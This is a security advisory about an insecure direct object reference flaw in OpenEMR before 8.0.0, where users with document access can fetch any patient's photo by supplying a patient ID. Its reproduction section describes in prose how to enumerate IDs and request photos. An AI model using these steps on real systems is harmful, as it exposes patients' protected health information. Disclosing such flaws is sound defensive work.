OpenEMR Patient Picture Context Unauthorized Photo Retrieval Vulnerability

A vulnerability exists in OpenEMR versions prior to 8.0.0, allowing authenticated users with document access to retrieve patient photos from the document controller without proper authorization checks. The issue arises because the 'patient_picture' context serves images based on patient IDs supplied by the user, without verifying if the user is allowed to access those records. This flaw enables unauthorized access to patient photos, which are considered protected health information.

Impact

This vulnerability leads to an Insecure Direct Object Reference (IDOR) issue, allowing unauthorized retrieval of patient photos for any patient by users with document access.

Reproduction

To reproduce this vulnerability, log in as a user with document read permissions. Identify another patient's ID, which can be found through various means such as reports or URL enumeration. Once the ID is obtained, request the patient picture by sending a GET request to the document controller with the 'patient_id' parameter set to the ID of the patient whose photo is to be retrieved. If the response includes the requested photo, the vulnerability is confirmed.

Remediation

Users can update to OpenEMR version 8.0.0 or later, where this vulnerability has been fixed.